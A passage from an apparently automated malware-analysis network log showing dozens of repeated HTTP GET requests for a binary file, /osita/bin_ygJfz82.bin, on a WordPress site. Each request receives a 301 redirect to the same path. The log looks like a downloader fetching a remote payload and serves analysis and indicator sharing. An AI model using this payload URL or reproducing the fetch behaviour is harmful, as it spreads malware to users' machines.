        Cache-Control: no-cache
        May 11, 2021 14:02:39.559333086 CEST7148INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:39 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:40.843426943 CEST7243OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:41.403718948 CEST7243INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:40 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:42.296632051 CEST7319OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:42.835222960 CEST7320INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:42 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:43.688587904 CEST7396OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:44.233208895 CEST7396INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:43 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:45.093619108 CEST7474OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:45.643275976 CEST7474INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:45 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:46.596085072 CEST7550OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:47.137923956 CEST7550INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:46 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:48.031953096 CEST7627OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:48.581952095 CEST7627INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:48 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:49.563762903 CEST7704OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:50.121766090 CEST7704INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:49 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:51.000540018 CEST7781OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:51.576663017 CEST7781INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:51 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:52.453692913 CEST7857OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:52.992763996 CEST7858INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:52 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:53.922744036 CEST7935OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:54.664397001 CEST7935INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:53 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:55.579246044 CEST8012OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:56.142584085 CEST8012INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:55 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:57.172707081 CEST8088OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:57.738956928 CEST8088INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:57 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:02:58.657743931 CEST8165OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:02:59.210799932 CEST8166INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:02:58 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:00.094716072 CEST8242OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:00.626313925 CEST8243INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:00 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:01.657938957 CEST8319OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:02.243979931 CEST8320INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:01 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:03.095273972 CEST8397OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:03.649492979 CEST8397INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:03 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:04.533756018 CEST8473OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:05.063960075 CEST8473INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:04 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:05.954613924 CEST8550OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:06.499663115 CEST8551INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:05 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:07.424957991 CEST8628OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:08.016978979 CEST8628INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:07 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:08.970968962 CEST8706OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:09.585134029 CEST8706INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:09 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:10.440140009 CEST8783OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:11.023025990 CEST8784INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:10 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:12.017676115 CEST8861OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:12.557931900 CEST8862INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:12 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:13.518129110 CEST8938OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:14.090298891 CEST8938INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:13 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:15.538902998 CEST9015OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:16.145585060 CEST9015INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:15 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:17.175231934 CEST9091OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:17.761703968 CEST9092INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:17 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:18.627703905 CEST9168OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:19.233160973 CEST9169INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:18 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:20.158875942 CEST9245OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:20.713126898 CEST9246INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:20 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:21.690817118 CEST9322OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:22.376015902 CEST9322INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:21 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:23.268528938 CEST9399OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:23.792221069 CEST9400INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:23 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:24.659966946 CEST9477OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:25.300637960 CEST9477INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:24 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:26.285713911 CEST9554OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:26.999505043 CEST9555INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:26 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:27.987538099 CEST9631OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:28.663278103 CEST9632INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:28 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:29.645052910 CEST9709OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:30.492567062 CEST9709INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:29 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:31.457528114 CEST9787OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:32.018726110 CEST9788INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:31 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:32.988437891 CEST9864OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:33.644983053 CEST9864INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:33 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:34.551186085 CEST9941OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:35.272936106 CEST9941INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:34 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:36.208066940 CEST10018OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:36.745985985 CEST10018INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:36 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:37.660623074 CEST10096OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:38.206449032 CEST10096INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:37 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:39.090409040 CEST10172OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:39.693404913 CEST10173INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:39 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:40.583724976 CEST10248OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:41.191375017 CEST10249INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:40 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:42.099026918 CEST10325OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:42.703739882 CEST10325INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:42 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:43.567915916 CEST10402OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:44.135768890 CEST10402INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:43 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:45.098849058 CEST10479OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:45.810832024 CEST10479INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:45 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:46.770783901 CEST10556OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
